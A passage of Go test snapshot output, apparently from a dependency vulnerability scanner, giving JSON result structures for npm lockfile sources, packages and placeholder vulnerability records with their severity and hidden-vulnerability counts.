"command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "", "Commit": "abcxyz", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 6, "OS": 0, "Project": 6, "Hidden": 0 }, "PackageTypeCount": { "Regular": 4, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 6, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 6 }, "FixableCount": { "Fixed": 0, "UnFixed": 6 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "Ecosystems": [ { "Name": "", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 }, { "Name": "unknown:/path/to/my/third/lockfile", "Type": "unknown", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/no_sources - 1] { "Ecosystems": null, "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_no_packages - 1] { "Ecosystems": [ { "Name": "", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 1 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [ { "ID": "GHSA-123", "GroupIDs": [ "GHSA-123" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 1, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 1 }, "PackageTypeCount": { "Regular": 1, "Hidden": 1 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "CRITICAL", "SeverityScore": "9" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 1, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 1, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 1, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 1 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 1, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 1 }, "PackageTypeCount": { "Regular": 0, "Hidden": 1 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 1 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1", "GHSA-123" ], "Aliases": [ "GHSA-123" ], "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 1, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 1 }, "PackageTypeCount": { "Regular": 0, "Hidden": 1 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1", "GHSA-123" ], "Aliases": [ "GHSA-123" ], "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "HIGH", "SeverityScore": "8.3" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 1, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 1, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 1, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- 